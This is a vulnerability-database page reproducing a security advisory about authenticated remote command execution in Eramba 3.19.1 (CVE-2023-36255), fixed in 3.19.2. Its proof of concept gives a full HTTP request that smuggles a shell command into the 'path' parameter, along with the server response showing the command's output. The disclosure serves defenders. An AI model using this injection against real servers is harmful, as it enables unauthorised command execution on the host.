Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSergey Makarov, trovent.ioPACKETSTORM:173888
HistoryAug 01, 2023 - 12:00 a.m.

Eramba 3.19.1 Remote Command Execution

2023-08-0100:00:00
Sergey Makarov, trovent.io
packetstormsecurity.com
120
eramba
remote command execution
web application
trovent security gmbh
cve-2023-36255
cwe-94
authenticated users
http request.

0.002 Low

EPSS

Percentile

55.8%

JSON
`# Trovent Security Advisory 2303-01 #  
#####################################  
  
  
Authenticated remote code execution in Eramba  
#############################################  
  
  
Overview  
########  
  
Advisory ID: TRSA-2303-01  
Advisory version: 1.0  
Advisory status: Public  
Advisory URL: https://trovent.io/security-advisory-2303-01  
Affected product: Eramba  
Affected version: 3.19.1 (Enterprise and Community edition)  
Vendor: Eramba Limited, https://www.eramba.org  
Credits: Trovent Security GmbH, Sergey Makarov  
  
  
Detailed description  
####################  
  
Eramba is a web application for managing Governance, Risk, and Compliance (GRC).  
Trovent Security GmbH discovered that the Eramba web application allows remote  
code execution for authenticated users.  
A possible attacker is able to modify the parameter "path" in the URL  
"https://hostname/settings/download-test-pdf?path=" to execute arbitrary  
commands in the context of the user account the application is running in.  
To see the output of the executed command in the HTTP response, debug mode has  
to be enabled.  
  
Severity: High  
CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)  
CVE ID: CVE-2023-36255  
CWE ID: CWE-94  
  
  
Proof of concept  
################  
  
HTTP request:  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1  
Host: [redacted]  
Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: https://[redacted]/settings  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
Connection: close  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
HTTP response:  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
HTTP/1.1 500 Internal Server Error  
Date: Fri, 31 Mar 2023 12:37:55 GMT  
Server: Apache/2.4.41 (Ubuntu)  
Access-Control-Allow-Origin: *  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Content-Disposition: attachment; filename="test.pdf"  
X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 2033469  
  
<!DOCTYPE html>  
<html>  
<head>  
<meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>  
Error: The exit status code '127' says something went wrong:  
stderr: "sh: 1: --dpi: not found  
"  
stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000  
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00  
inet 127.0.0.1/8 scope host lo  
valid_lft forever preferred_lft forever  
inet6 ::1/128 scope host  
valid_lft forever preferred_lft forever  
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000  
link/ether [redacted] brd ff:ff:ff:ff:ff:ff  
inet [redacted] brd [redacted] scope global ens33  
valid_lft forever preferred_lft forever  
inet6 [redacted] scope link  
valid_lft forever preferred_lft forever  
"  
command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0'  
--margin-right '0' --margin-top '0' --orientation 'Landscape'  
--javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html'  
'/tmp/knp_snappy6426d423104587.46971034.pdf'. </title>  
  
[...]  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
Solution / Workaround  
#####################  
  
The vendor released a fixed version of Eramba.  
  
Fixed in version 3.19.2.  
  
  
History  
#######  
  
2023-03-31: Vulnerability found  
2023-04-04: Vendor contacted  
2023-04-17: Vendor confirmed vulnerability  
2023-04-20: Vendor released fixed version  
2023-05-25: Trovent verified remediation of the vulnerability  
2023-06-13: CVE ID requested  
2023-07-28: CVE ID received  
2023-08-01: Advisory published  
`

Related

prion 1
zdt 1
cve 1
cvelist 1
nvd 1
prion
prion
Code injection
2023-08-03 02:15:00
zdt
zdt
Eramba 3.19.1 Remote Command Execution Exploit
2023-08-01 00:00:00
cve
cve
CVE-2023-36255
2023-08-03 02:15:09
cvelist
cvelist
CVE-2023-36255
2023-08-03 00:00:00
nvd
nvd
CVE-2023-36255
2023-08-03 02:15:09

0.002 Low

EPSS

Percentile

55.8%

JSON
Related for PACKETSTORM:173888
prion1zdt1cve1cvelist1nvd1